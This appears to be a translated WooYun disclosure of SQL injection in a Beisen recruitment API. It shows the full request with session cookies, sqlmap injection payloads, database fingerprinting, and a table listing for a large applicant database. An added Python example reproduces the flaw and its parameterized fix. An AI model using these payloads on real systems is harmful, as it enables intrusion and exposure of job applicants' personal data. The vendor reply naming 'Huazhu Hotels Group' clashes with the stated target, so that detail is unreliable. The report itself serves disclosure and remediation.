WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article viewer -------- http://drop.zone.ci/
2016-03-13: Details reported to the vendor; awaiting vendor handling
2016-03-14: Vendor has confirmed; details disclosed to the vendor only
2016-03-24: Details disclosed to core white hats and relevant domain experts
2016-04-03: Details disclosed to regular white hats
2016-04-13: Details disclosed to intern white hats
2016-04-28: Details disclosed to the public
RT (as the title says).
Vulnerable location:
Vulnerable URL:
POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://recruitofficer.tms.beisen.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: recruitofficer.tms.beisen.com
Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
Content-Length: 53

pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*
The name parameter is injectable (the trailing * in the body marks the injection point for sqlmap).
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[20:30:16] [INFO] testing Microsoft SQL Server
[20:30:16] [INFO] confirming Microsoft SQL Server
[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
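All three sqlmap payloads above open with %' and close with AND '%'=', which is the signature of a name value being spliced into a LIKE '%...%' predicate. The following Python script is an added example, not code from the original report or from Beisen's application: it rebuilds that defect against an in-memory SQLite table with constructed job-ad rows (the JobAd table and its title/locName columns are hypothetical; the real schema is not on the page), feeds it the report's boolean-based payload and a false-branch twin, and shows the parameterized, ESCAPE-aware query that removes the true/false oracle.

```python
import sqlite3
from urllib.parse import unquote

# Constructed sample rows standing in for the recruitment system's job-ad
# table. Table and column names (JobAd, title, locName) are hypothetical;
# the real schema is not on the page.
JOB_ADS = [
    ("Backend Engineer", "上海"),
    ("Frontend Engineer", "上海"),
    ("Recruiter", "北京"),
]

# The name value from the report's boolean-based payload, URL-encoded exactly
# as sqlmap sent it, plus a constructed false-branch twin of the same shape.
TRUE_PROBE = "%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='"
FALSE_PROBE = "%E4%B8%8A%E6%B5%B7%' AND 7680=7681 AND '%'='"
PLAIN_NAME = "%E4%B8%8A%E6%B5%B7"  # just 上海, what a legitimate client sends


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE JobAd (title TEXT, locName TEXT)")
    conn.executemany("INSERT INTO JobAd VALUES (?, ?)", JOB_ADS)
    return conn


def vulnerable_search(conn, raw_name):
    # The defect behind the finding: the decoded parameter is spliced into a
    # LIKE literal, so a quote in the input ends the literal and the rest of
    # the value runs as SQL. The %' ... '%'=' framing keeps the statement
    # syntactically valid on both branches, which is why the probe is quiet.
    name = unquote(raw_name)
    sql = "SELECT title FROM JobAd WHERE locName LIKE '%" + name + "%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    # Escape the LIKE metacharacters so user input matches literally; without
    # this a bound parameter of "%" alone would still return every row.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def safe_search(conn, raw_name):
    # Hardened form: the value travels as a bound parameter, the wildcards are
    # added by the application, and ESCAPE keeps % and _ in the input literal.
    name = unquote(raw_name)
    pattern = "%" + escape_like(name) + "%"
    sql = "SELECT title FROM JobAd WHERE locName LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (pattern,))]


def compare():
    # The result sets a reviewer would diff: the vulnerable query answers the
    # TRUE and FALSE probes differently (the oracle a boolean-based blind
    # relies on); the hardened query treats both probes as an ordinary,
    # non-matching city name and still serves the legitimate value.
    conn = build_db()
    return {
        "vuln_true": sorted(vulnerable_search(conn, TRUE_PROBE)),
        "vuln_false": sorted(vulnerable_search(conn, FALSE_PROBE)),
        "safe_true": sorted(safe_search(conn, TRUE_PROBE)),
        "safe_false": sorted(safe_search(conn, FALSE_PROBE)),
        "safe_plain": sorted(safe_search(conn, PLAIN_NAME)),
    }


if __name__ == "__main__":
    for label, rows in compare().items():
        print(f"{label:>10}: {rows}")
```

Two points carry over to the ASP.NET/SQL Server stack the report identifies: binding the value (SqlParameter instead of string concatenation) is what closes the injection, and the ESCAPE clause is the separate caveat that keeps a parameterized LIKE from becoming a match-everything query when the input itself contains % or _.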
Databases:
The amount of data is huge, see below. As for what information it holds, you understand that better than I do. This was only a test; I did not dump the database, and the logs can confirm that. Could I get a high rank?
Database: BeisenRecruitment001
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.Rel_ObjectDataOfApplicant | 21910244 |
| dbo.StandardResumeDetailValue | 18802224 |
| dbo.RelationHistory | 11254767 |
| dbo.ApplyDocument | 7516347 |
| dbo.ApplicantHistory | 6111962 |
| dbo.ApplicantHistoryDigest | 5173063 |
| dbo.PhaseTransferHistory | 4925655 |
| dbo.REL_PersonJobStoreDB | 4376542 |
| dbo.ResumeExperience | 4144101 |
| dbo.ApplicantImportCenterInfo | 2715594 |
| dbo.ResumeEducation | 2707816 |
| dbo.Rel_ObjectDataOfApply | 2616834 |
| dbo.SearchCV | 2605691 |
| dbo.SearchCVExtend | 2601771 |
| dbo.ApplicantProfileLite | 2590488 |
| dbo.StandradResumeValue | 2469684 |
| dbo.REL_PersonJobHistory | 2425882 |
| dbo.PersonApplyStat | 1998890 |
| dbo.MailMessage | 1339401 |
| dbo.GenericExtendCounter | 1256675 |
| dbo.PendingPerson | 1179443 |
| dbo.ResumeProject | 1056161 |
| dbo.PersonStoreDbHistory | 938211 |
| dbo.ApplicantImportCenter | 285102 |
| dbo.SerialNumber | 266092 |
| dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574 |
| dbo.SerialNumberHistory | 243251 |
| dbo.MessageSentHistory | 240622 |
| dbo.REL_BeisenUserID | 233569 |
| dbo.InterviewHistory | 146300 |
| dbo.Relation_Interview_Interviewee | 131212 |
| dbo.Remark | 116225 |
| dbo.JobRelationOperationHistory | 107369 |
| dbo.Rel_PersonAndResumeFilter | 89735 |
| dbo.TitaTaskManage | 81698 |
| dbo.AppMessage | 78557 |
| dbo.InterviewInfoHistroy | 76967 |
| dbo.InterviewInfo | 73927 |
| dbo.ProxyLog | 73015 |
| dbo.Relation_Interview_RemindJob | 72799 |
| dbo.ReplyRecord | 62606 |
| dbo.DownLoadedResume | 61974 |
| dbo.ProcessPhaseStatusConfig | 60397 |
| dbo.Counter_2 | 53073 |
| dbo.Relation_Interview_Interviewer | 51759 |
| dbo.ReplySetHistory | 48092 |
| dbo.Rel_PhaseAndStatus | 45542 |
| dbo.InterviewEvaluateResult | 43635 |
| dbo.UploadedAttachment | 40956 |
| dbo.ReplyMessageInfo | 35024 |
| dbo.InterviewerReplySendRecord | 33324 |
| dbo.JobAdChannel_Class | 28797 |
| dbo.JobAD | 27143 |
| dbo.JobADLoc | 25640 |
| dbo.Rel_ProcessAndPhase | 24893 |
| dbo.InterviewFeedBack | 24355 |
| dbo.JobAd_External | 23578 |
| dbo.JobBrowseLog | 22272 |
| dbo.Job | 19671 |
| dbo.ProcessPhase | 19285 |
| dbo.ProcessStatus | 19110 |
| dbo.JobADAdditionalObject | 17633 |
| dbo.ResumeTempFolder | 17386 |
| dbo.ResumeFilter | 16533 |
| dbo.WechatUserAndPerson | 15892 |
| dbo.ReportLog | 15809 |
| dbo.Rel_ResumeTempFolderAndUser | 15744 |
| dbo.EmaiJobRule | 15392 |
| dbo.JobLoc | 12968 |
| dbo.ProcessReason | 11750 |
| dbo.JobAdChannel_Apply | 10986 |
| dbo.Officer | 10885 |
| dbo.Rel_StatusAndReason | 10446 |
| dbo.ResumeDownload | 9883 |
| dbo.REL_ObjectId_ShareGroupId | 9232 |
| dbo.OfferHistory | 9049 |
| dbo.InterviewerReply | 8989 |
| dbo.BatchRankingScore | 7436 |
| dbo.RecieveSummary | 7283 |
| dbo.Rel_ApplicantAndLabel | 7135 |
| dbo.REL_JobAndInterviewEvaluation | 6754 |
| dbo.SendMailLog | 6420 |
| dbo.InterviewEvaluationDetailItem | 6050 |
| dbo.ExportHistory | 5984 |
| dbo.ApplicantViewCondition | 5980 |
| dbo.ConstItem | 5913 |
| dbo.TitaPorjectManage | 5753 |
| dbo.Permission | 5176 |
| dbo.EffectiveOffer | 4958 |
| dbo.EffectiveOfferApply | 4898 |
| dbo.RecruitProcess | 4599 |
| dbo.HrJobBrowseLog | 4484 |
| dbo.OfferAssesment | 4049 |
| dbo.OfferCreaterMailInfo | 3849 |
| dbo.Offer | 3779 |
| dbo.Interview | 3595 |
| dbo.AutoInvitTest | 3348 |
| dbo.ApplicantView | 3009 |
| dbo.Rel_InternalRecommend | 2994 |
| dbo.OfferApply | 2849 |
| dbo.Relation_InterviewMessage_Interviewee | 2627 |
| dbo.StoreDB | 2440 |
| dbo.Finder | 2141 |
| dbo.SearchFieldOption | 1956 |
| dbo.StaticizeLog | 1899 |
| dbo.Attention | 1852 |
| dbo.BizLookLog | 1711 |
| dbo.ChannelRelation | 1657 |
| dbo.MicroProcessMessageLog | 1335 |
| dbo.InterviewLocation | 1316 |
| dbo.RewardRulesSublist | 1098 |
| dbo.StatisticsThisMonth | 1035 |
| dbo.JobADPostUserName | 919 |
| dbo.ConstItemId | 825 |
| dbo.ApplicantLock | 739 |
| dbo.RecruitPackage | 716 |
| dbo.ChannelAuthorize | 691 |
| dbo.ChannelSource | 677 |
| dbo.ExamRoomPlan | 666 |
| dbo.InterviewInfoType | 632 |
| dbo.BadMessage | 604 |
| dbo.InterviewSession | 573 |
| dbo.MicroProcessActivity | 566 |
| dbo.BlackListHistory | 545 |
| dbo.RewardRules | 457 |
| dbo.RecuritProject | 440 |
| dbo.BlackList | 419 |
| dbo.MicroProcess | 360 |
| dbo.ExportFieldTemplate | 357 |
| dbo.WebotSyncRecord | 336 |
| dbo.ChannelDeliveryMapping | 310 |
| dbo.InterviewEvaluationPartItem | 309 |
| dbo.GlobalSetting | 296 |
| dbo.ResumeKeywordsLibrary | 294 |
| dbo.HunterAccount | 249 |
| dbo.Label | 242 |
| dbo.MailReceiveStrategy | 238 |
| dbo.ReceiveEmailList | 238 |
| dbo.IndexMap | 192 |
| dbo.JobTitleLibrary | 185 |
| dbo.Duty | 182 |
| dbo.ReSendEmailOrSmsHistory | 177 |
| dbo.StandardResumeDetailField | 157 |
| dbo.Station | 141 |
| dbo.ConstType | 136 |
| dbo.CadidateId | 131 |
| dbo.InterviewEvaluationBasicInfo | 126 |
| dbo.JobTemplate | 125 |
| dbo.SelectAllPageErrorInfo | 121 |
| dbo.InterviewEvaluate | 101 |
| dbo.InterviewSite | 97 |
| dbo.MarketActivity | 96 |
| dbo.WeChatOfficer_MyRecommend_CountResult | 73 |
| dbo.FromList | 56 |
| dbo.Requirement | 56 |
| dbo.TalentMining | 52 |
| dbo.WeChatOfficer_PyInternal_CountResult | 49 |
| dbo.Relation_InterviewMessage_Officer | 47 |
| dbo.InterviewEvaluationDictDetial | 40 |
| dbo.Assesment | 39 |
| dbo.InterviewSite_Officers | 36 |
| dbo.ExamRoom | 28 |
| dbo.RestTime | 28 |
| dbo.Widget_Option | 28 |
| dbo.Medium | 27 |
| dbo.RankAndFilter | 25 |
| dbo.Invitation | 23 |
| dbo.ApplicantLockSet | 18 |
| dbo.WeChatOfficer_RedEnvelopes | 16 |
| dbo.RankingScoreHistory | 15 |
| dbo.StandardResumeDetailSection | 14 |
| dbo.ActionTiggerCondition | 13 |
| dbo.ActionForSendNotification | 11 |
| dbo.RecuritProjectCondition | 11 |
| dbo.AutoTask | 10 |
| dbo.Functions | 10 |
| dbo.ChannelKind | 9 |
| dbo.StandardResumeField | 9 |
| dbo.MediumGroup | 8 |
| dbo.Widget | 7 |
| dbo.InterviewEvaluationDictType | 4 |
| dbo.TaskItem | 3 |
| dbo.AccessmentResultForUpdateApply | 2 |
| dbo.DefaultEmailReceiveStrategy | 2 |
| dbo.InterviewEamilEvaluation | 1 |
+-------------------------------------------------------------+---------+

Database: msdb
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.backupfile | 975572 |
| dbo.backupset | 487786 |
| dbo.backupmediafamily | 487783 |
| dbo.backupmediaset | 487783 |
| dbo.restorefile | 68 |
| dbo.restorefilegroup | 34 |
| dbo.restorehistory | 34 |
| dbo.syspolicy_configuration | 4 |
+-------------------------------------------------------------+---------+
Filter the input.
Severity: High
Vulnerability Rank: 12
Confirmed at: 2016-03-14 16:09
Hello! Thank you for your attention to Huazhu Hotels Group. This issue has been handed over to the relevant team for follow-up.
None yet.